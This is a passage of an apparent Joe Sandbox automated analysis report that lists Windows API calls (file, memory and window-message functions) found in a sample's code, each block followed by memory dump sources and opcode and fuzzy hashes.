                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Global$AllocFree
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3394109436-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                                                      • String ID:
